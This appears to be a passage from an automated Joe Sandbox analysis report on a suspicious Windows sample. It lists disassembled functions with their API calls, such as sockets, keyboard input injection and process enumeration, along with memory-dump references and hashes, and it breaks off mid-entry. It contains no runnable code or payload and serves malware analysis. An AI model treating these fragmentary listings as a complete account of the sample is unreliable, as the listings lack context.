                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: eda33758a49b038b57b171361d316d1186f4fa0b2026bb4022b101d098e97e7a
                                                      • Instruction ID: 3677582099dda6e36bd24cc8c8f8e13adffa741bf7b18bb7060a207dc6540fb9
                                                      • Opcode Fuzzy Hash: eda33758a49b038b57b171361d316d1186f4fa0b2026bb4022b101d098e97e7a
                                                      • Instruction Fuzzy Hash: 8D512870A00209EFDB20DF59D8809AE7BB5EF45360F148269F915D7290D774AD41EF90
                                                      Function 00FA1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00FA1AFD
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1B0B
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FA1B8A
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1B94
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$socket
                                                      • String ID:
                                                      • API String ID: 1881357543-0
                                                      • Opcode ID: 1605c2fa413186d552fcb6c1e9c86d500cddfef609a3d53e9b6d55175f777fd8
                                                      • Instruction ID: 9f73813840a5f09805867ff19e5ba7c518f9803edcc13322dd4cf22ce027652a
                                                      • Opcode Fuzzy Hash: 1605c2fa413186d552fcb6c1e9c86d500cddfef609a3d53e9b6d55175f777fd8
                                                      • Instruction Fuzzy Hash: D441E274600210AFE720EF20DC86F2A77E5AF89728F548448F91A9F7D2D776DD419BA0
                                                      Function 00F5B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b96f990d36ecb8449ab49a17b5a2ab9c690aa617da4a514dc3c769fa4df5307
                                                      • Instruction ID: ede0ed41c9fe0a1f4eec2d0cb2c0a7a5e41ba9eb3ff2ccfca38511f9bddeed8a
                                                      • Opcode Fuzzy Hash: 4b96f990d36ecb8449ab49a17b5a2ab9c690aa617da4a514dc3c769fa4df5307
                                                      • Instruction Fuzzy Hash: FB413C72A00304BFD724DF38CC41B6A7BE9EB88721F20462EFA05DB282D375A9059790
                                                      Function 00F956D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F95783
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00F957A9
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F957CE
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F957FA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: 8aad0bb1a769def303b1f9095d733ab133db954b3f1853797986c354a23a5da9
                                                      • Instruction ID: 3944275e0638e52db02e7e71ee04daf6ed3b656fd078d9104a5e996a321ef26d
                                                      • Opcode Fuzzy Hash: 8aad0bb1a769def303b1f9095d733ab133db954b3f1853797986c354a23a5da9
                                                      • Instruction Fuzzy Hash: 70412C35600610DFCF11EF55D945A5EBBE1AF89720B188488E84AAF366CB34FD00EF91
                                                      Function 00F5D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00F46D71,00000000,00000000,00F482D9,?,00F482D9,?,00000001,00F46D71,8BE85006,00000001,00F482D9,00F482D9), ref: 00F5D910
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F5D999
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F5D9AB
                                                      • __freea.LIBCMT ref: 00F5D9B4
                                                        • Part of subcall function 00F53820: RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: 00993fddc9103398ce812935d6b2115da006e6dafc049de2c45c231cdedf1808
                                                      • Instruction ID: a05fa3b779f667a7cd9486da4c96aea1d0a75bfe2702d95fffe173dc79a504e2
                                                      • Opcode Fuzzy Hash: 00993fddc9103398ce812935d6b2115da006e6dafc049de2c45c231cdedf1808
                                                      • Instruction Fuzzy Hash: 4331D272A0120AABDF24DF64DC81EAF7BA5EB41321F050168FD04E7151EB35DD58EB90
                                                      Function 00FB52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00FB5352
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB5375
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FB5382
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FB53A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                      • String ID:
                                                      • API String ID: 3340791633-0
                                                      • Opcode ID: b7f7908a4768618e027f86a292cdc92ad410ffa4e07c3190a26bb969ecc4247f
                                                      • Instruction ID: 4a162210ad1b9d43c6a51225a14638253704fa15ccab636c834b3117099d5a37
                                                      • Opcode Fuzzy Hash: b7f7908a4768618e027f86a292cdc92ad410ffa4e07c3190a26bb969ecc4247f
                                                      • Instruction Fuzzy Hash: D031B031E55A0CEFEB309A56CC45BE937E7AB04BA0F5C4101BA11963E0C7B99980BF81
                                                      Function 00F8AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00F8ABF1
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F8AC0D
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F8AC74
                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00F8ACC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 28496facd8f14c8df6164f4f90a9a1572f5dcab3b479e35aa75354e2e332fdc6
                                                      • Instruction ID: 37bf270aff8ea9e522842fb3cb1e0ef2435a507bb91301b3189e3df2f8e1b697
                                                      • Opcode Fuzzy Hash: 28496facd8f14c8df6164f4f90a9a1572f5dcab3b479e35aa75354e2e332fdc6
                                                      • Instruction Fuzzy Hash: D1310970E047186FFF35EB658C05BFA7BA5EB4A320F08431BE485521D1D375C985A792
                                                      Function 00FB7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 00FB769A
                                                      • GetWindowRect.USER32(?,?), ref: 00FB7710
                                                      • PtInRect.USER32(?,?,00FB8B89), ref: 00FB7720
                                                      • MessageBeep.USER32(00000000), ref: 00FB778C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: 601fd80eddd1d0c6ff6118fcd77b90cb1577ba3fbec50c59962b01b8a66c475b
                                                      • Instruction ID: f3706a8832162b553a5519b063db00957e8316fc30385e22fb0e3b5da775efcd
                                                      • Opcode Fuzzy Hash: 601fd80eddd1d0c6ff6118fcd77b90cb1577ba3fbec50c59962b01b8a66c475b
                                                      • Instruction Fuzzy Hash: EF418D34A09318DFDB11EF5AC894EE9BBF5FF88310F2541A8E4159B261CB70A941EF90
                                                      Function 00FB16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00FB16EB
                                                        • Part of subcall function 00F83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F83A57
                                                        • Part of subcall function 00F83A3D: GetCurrentThreadId.KERNEL32 ref: 00F83A5E
                                                        • Part of subcall function 00F83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F825B3), ref: 00F83A65
                                                      • GetCaretPos.USER32(?), ref: 00FB16FF
                                                      • ClientToScreen.USER32(00000000,?), ref: 00FB174C
                                                      • GetForegroundWindow.USER32 ref: 00FB1752
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 562b113fb2c73c11024147c59ca9a635abeb601d88538c6bef81ea1a0ace999a
                                                      • Instruction ID: 4bcdaff091ab11d7c2eccfb12c635587e988b0295f729be7b4ce6a96b5890b07
                                                      • Opcode Fuzzy Hash: 562b113fb2c73c11024147c59ca9a635abeb601d88538c6bef81ea1a0ace999a
                                                      • Instruction Fuzzy Hash: 76315D75D00259AFCB00EFAAD881DEEBBF9EF48304B5080A9E415E7211DB359E45DFA0
                                                      Function 00F8D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00F8D501
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00F8D50F
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00F8D52F
                                                      • CloseHandle.KERNEL32(00000000), ref: 00F8D5DC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 420147892-0
                                                      • Opcode ID: 0f01b80954539d4b1c6433e887860356d728ad8c4096ef2a531cf8b1f3e18b80
                                                      • Instruction ID: 9fabf39f9271f2b5651cf7c25d7cd472e5354df907497f9b0f0ec8d65cb34c08
                                                      • Opcode Fuzzy Hash: 0f01b80954539d4b1c6433e887860356d728ad8c4096ef2a531cf8b1f3e18b80
                                                      • Instruction Fuzzy Hash: 3231B1725083049FD300EF54DC81AAFBBF8EF99354F58092DF581971A1EB719948EBA2
                                                      Function 00FB8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • GetCursorPos.USER32(?), ref: 00FB9001
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F77711,?,?,?,?,?), ref: 00FB9016
                                                      • GetCursorPos.USER32(?), ref: 00FB905E
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F77711,?,?,?), ref: 00FB9094
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 574ffd472e2afb79072c04a5116a4663903167812baefe12414bdb04c1cba940
                                                      • Instruction ID: 14d38d7d1689340823073fa26598df452f4275daaa84da43c505ce6df56e53cc
                                                      • Opcode Fuzzy Hash: 574ffd472e2afb79072c04a5116a4663903167812baefe12414bdb04c1cba940
                                                      • Instruction Fuzzy Hash: F4217C35A04018EFDB259FA5C898EFA7BB9EF8A3A0F044155FA0547261C3B19950FFA0
                                                      Function 00F8D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00FBCB68), ref: 00F8D2FB
                                                      • GetLastError.KERNEL32 ref: 00F8D30A
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F8D319
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FBCB68), ref: 00F8D376
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: 75ecb29bc1b6014369cf540f31e9b0e89162ce9ac8bcc470fbb8dc4bb84cea04
                                                      • Instruction ID: 080b28fefb28f01f234f25d0ac533cb2f9e075caeea23b2f2d0a6de4df8247df
                                                      • Opcode Fuzzy Hash: 75ecb29bc1b6014369cf540f31e9b0e89162ce9ac8bcc470fbb8dc4bb84cea04
                                                      • Instruction Fuzzy Hash: A2219F709083019F8700EF28D8858AFB7E8AE9A368F544A1DF499C72E1D731D945EB93
                                                      Function 00F81571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F8102A
                                                        • Part of subcall function 00F81014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F81036
                                                        • Part of subcall function 00F81014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F81045
                                                        • Part of subcall function 00F81014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F8104C
                                                        • Part of subcall function 00F81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F81062
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F815BE
                                                      • _memcmp.LIBVCRUNTIME ref: 00F815E1
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F81617
                                                      • HeapFree.KERNEL32(00000000), ref: 00F8161E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: fff31ba5e209ac252fbdead06e33e9437b3045632c0afb149d2e4a54601f551d
                                                      • Instruction ID: b300cdc46e7e9db826592090445335358ee9f3c5e7bee4b74b973c6ea74bea2f
                                                      • Opcode Fuzzy Hash: fff31ba5e209ac252fbdead06e33e9437b3045632c0afb149d2e4a54601f551d
                                                      • Instruction Fuzzy Hash: 0F216D71E00109EFDF10EFA4C945BEEB7B8FF44354F184659E441AB241E734AA46EBA0
                                                      Function 00FB2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FB280A
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FB2824
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FB2832
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FB2840
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: b4903e840da80da8a481e54a3975405a0388947d7b9770db99a6eec0dec9466f
                                                      • Instruction ID: 450a5f2b0b8a6dcba95d23e850e15e84fd554d48e0bd7e1a319502b4f711219c
                                                      • Opcode Fuzzy Hash: b4903e840da80da8a481e54a3975405a0388947d7b9770db99a6eec0dec9466f
                                                      • Instruction Fuzzy Hash: B121F131604110AFD7149B25CC85FAA7B99AF45324F288258F4268B6E2CB75FC42DFD0
                                                      Function 00F878F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F88D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F8790A,?,000000FF,?,00F88754,00000000,?,0000001C,?,?), ref: 00F88D8C
                                                        • Part of subcall function 00F88D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00F88DB2
                                                        • Part of subcall function 00F88D7D: lstrcmpiW.KERNEL32(00000000,?,00F8790A,?,000000FF,?,00F88754,00000000,?,0000001C,?,?), ref: 00F88DE3
                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F88754,00000000,?,0000001C,?,?,00000000), ref: 00F87923
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00F87949
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F88754,00000000,?,0000001C,?,?,00000000), ref: 00F87984
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: 3ef81d34b19c6948cd37092041cb0bb12a0710593543a06945e0cbbfd583ff33
                                                      • Instruction ID: 2788947fe1afc1cf3787968de2d50c28c5832ca35c9749079a094cff549a96f3
                                                      • Opcode Fuzzy Hash: 3ef81d34b19c6948cd37092041cb0bb12a0710593543a06945e0cbbfd583ff33
                                                      • Instruction Fuzzy Hash: 3D11B43A600346ABCB15BF39DC45EBB77A9EF453A0B50402AE946C7264EB31D811E791
                                                      Function 00FB7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
